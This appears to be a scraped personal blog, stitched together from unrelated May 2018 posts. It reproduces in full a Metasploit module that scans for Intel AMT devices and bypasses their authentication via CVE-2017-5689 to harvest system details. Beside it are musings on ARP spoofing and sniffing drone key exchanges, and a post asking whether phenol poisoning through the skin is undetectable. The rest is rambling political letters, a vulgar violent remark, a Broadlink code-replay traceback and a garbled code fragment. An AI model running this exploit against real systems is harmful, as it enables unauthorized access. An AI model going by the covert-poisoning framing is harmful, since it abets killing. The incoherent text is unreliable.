Thursday, May 10, 2018

...back to war!...we are talking about big "system" infra estrutures and builded plug ins in drones

).map{|x| x.first.to_s.gsub("/", "/") }).map{|x| x.first.to_s.gsub("/", "/") }
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Intel AMT Digest Authentication Bypass Scanner',
'Description' => %q{
This module scans for Intel Active Management Technology endpoints and attempts
to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service
can be found on ports 16992, 16993 (tls), 623, and 624 (tls).
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-5689' ],
[ 'URL', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ],
[ 'URL', 'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr' ],
],
'DisclosureDate' => 'May 05 2017'
)
register_options(
[
Opt::RPORT(16992),
])
end
# Fingerprint a single host
def run_host(ip)
begin
connect
res = send_request_raw({ 'uri' => '/hw-sys.htm', 'method' => 'GET' })
unless res && res.headers['Server'].to_s.index('Intel(R) Active Management Technology')
disconnect
return
end
vprint_status("#{ip}:#{rport} - Found an Intel AMT endpoint: #{res.headers['Server']}")
unless res.headers['WWW-Authenticate'] =~ /realm="([^"]+)".*nonce="([^"]+)"/
vprint_status("#{ip}:#{rport} - AMT service did not send a valid digest response")
disconnect
return
end
realm = $1
nonce = $2
cnonce = Rex::Text.rand_text(10)
res = send_request_raw(
{
'uri' => '/hw-sys.htm',
'method' => 'GET',
'headers' => {
'Authorization' =>
"Digest username=\"admin\", realm=\"#{realm}\", nonce=\"#{nonce}\", uri=\"/hw-sys.htm\", " +
"cnonce=\"#{cnonce}\", nc=1, qop=\"auth\", response=\"\""
}
})
unless res && res.body.to_s.index("Computer model")
vprint_error("#{ip}:#{rport} - AMT service does not appear to be vulnerable")
return
end
proof = res.body.to_s
proof_hash = nil
info_keys = res.body.scan(/([^\<]+)(?:<\/p>)?/
if info_keys.length > 0
proof_hash = {}
proof = ""
info_vals = res.body.scan(/([^\<]+)</
info_keys.each do |ik|
iv = info_vals.shift
break unless iv
proof_hash[ik] = iv
proof << "#{iv}: #{ik}\n"
end
end
print_good("#{ip}:#{rport} - Vulnerable to CVE-2017-5869 #{proof_hash.inspect}")
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'intel.amt.system_information',
:data => proof_hash
)
report_vuln({
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => "Intel AMT Digest Authentication Bypass",
:refs => self.references,
:info => proof
})
rescue ::Timeout::Error, ::Errno::EPIPE
ensure
disconnect
end
end
end
CVE-2017-5689 Intel AMT Digest Authentication Bypass Scanner | Rapid7
Back to search Intel AMT Digest Authentication Bypass Scanner This module scans for Intel Active…
RAPID7.COM

at No comments:
welcome back to war! deadline is over! ...back to computing, machines and "disrupt" the "system" ! (after this I'm going hunting the code, ok) Let's read a very good explanation about "timeouts" on ARP packets " keep the other guys' ARP caches from timing out by proactively broadcasting your own ARP announcements. Most Ethernet layers will accept gratuitous ARP responses into their caches without trying to correlate them to ARP requests they have previously sent."
ARP Timeouts. Why fixed periodic?
This one's been bugging me for years. Basic question: Is there some reason ARP has to be implemented with fixed timeouts on ARP cache entries? I do a lot of work in Real Time ciricles. We do most...
at No comments:

Wednesday, May 9, 2018

Dear Marx, since communism experience revealed to be, as much corrupt as democracy, and since I believe in Justice, and dislike capitalism as the primary reason for social injustice, I purpose:
1. Political parties abolish , and no more one single politician according the principle of election, popular or not
2 Political decisions will now be made over the internet, trough, local and central forums, with the open and free participation of all citizens, in equal situation .
3 Proposals will be first voted online, to pass the level of detailed discussion. 
4 Public jobs will be selected by computing tests
at No comments:

Phenol vapor and liquid penetrate the skin with an absorption efficiency approximately equal to the absorption efficiency by inhalation. In one case, death occurred within 30 minutes after skin contact...my chemical question is...is it undetectable...since, its absorb by the skin, on the aspect, it disappears the traces over the spot of contact...and its undetectable because it just appears as caffeine consume ?


at No comments:
of course its unthinkable to kill whoores donkey dolls, shiting gold from the anus at the whitehouse
Top secret CIA poison dart gun 'gives targets deadly HEART ATTACKS and leaves no trace'
A WHISTLEBLOWER has claimed the CIA developed a "heart attack gun" laced with deadly poison to carry out assassinations.
EXPRESS.CO.UK
Comentários
Elsa David of course you have it too PRAVDA.RU  and so the poor ambassador died
at No comments:

Anyone being blocked to read the code, contact me...because I'm being blocked to download as pdf, and I have a word document with the code

so, last I heard is that ARP poisining was not a big shit this days, because the add lots of shit to nc-3 ...but I have here some good news, and a great code....turning the game around
at No comments:

PALESTINE MAHOUMD ABBAS

Dear PM, development and peace depend on stability. You must read the Italian and German Unification process...If you would accept negotiate a type of Switzerland with the Israelis, several private corporations would immediately invest in Palestine. The conditions for an Unification, among others, are to have a common genderamie, which has a position on the State Council, to declare war to foreigner countries. Let me put this more clearly, are you interested it , on selling your natural gas, and run the company at Wall Street? Best regards
at No comments:

India

Dear PM My opinion over the israeli-palestinian conflict as been that a pratical and profit solution for both, is the Unification. As an European, I've studied the Italian and German Unification, finding that those achievements end up on strong countries. I'm writing today to PM Abbas, making the proposal; but my goal on writing to you, is about Iran Dossier. The Russians will not give up Iran, because of their gas conducts until India, and there's no territory exchange by now, since Libya, Egypt and Afghanistan positions were already "trade" . As India is a non aligned country, and for sure armament corporation with the Israelis, does not affect a possible Russian partnership, could India stand for "pressure" the Russians to "erase" Iranian nuclear tread? Let me put it simple PM...Iranian society is changing fast, probably will end up on a western type of democracy, with or without CIA anarchy artificial made...So, nuclear should be privatize ; on a possible change of philosophy on Iran, both sides, are interested in the so called democracy best ..."corruption" . Please PM, think about it... Best regards Elsa Cristina e Botelho dos Santos David
at No comments:

Tuesday, May 8, 2018

Ok, gentlemen, this is the board of Sentinel (similar) . what we can see here, is that agile gateway where the key exchange crypto is, is then connected to re transmission radios, at least 4. was trying to find a sniffer, but its very hard, no wireshark suits this. So, you have 4 waveforms for sniffing, until you find the frame which is the key between the ground base and the drone. Nevertheless, this also relies on the email protocol they are using for exchanging messages with keys.

Mostrar mais reações
at No comments:

and the solution is ..."every TC2 needs to duplicate the code 6 times"

Connecting to Broadlink device.... Connected.... Traceback (most recent call last): File "sendCode.py", line 21, in device.send_data(codeData.decode('hex')) File "D:\Python27\lib\site-packages\broadlink-0.3-py2.7.egg\broadlink\__init__.py", line 455, in send_data self.send_packet(0x6a, packet) File "D:\Python27\lib\site-packages\broadlink-0.3-py2.7.egg\broadlink\__init__.py", line 250, in send_packet response = self.cs.recvfrom(1024) socket.timeout: timed out
@masterkenobi Awesome, I think that is something related to the broadlink python library.
Now take this working code length convet it to base 64 and send it using HA.

at No comments:
Welcome back to war! Gentlemen, again spoofing..when you read this code, you will find out that the error remains on the install packet of python broadcast .egg since the lengh is not correct (neither I wanted this hex, for our purpose) ..so after reading and fork the code, I'll post the solution ...



TC2 Dump Code Replay · Issue #5 · NightRang3r/Broadlink-e-control-db-dump
Hi NightRang3r, thanks for putting together a great tool. I'm not a coder and I'm making this happen base on your instructions. I got as far as dumping the code using…
GITHUB.COM

at No comments:
Subscribe to: Comments (Atom)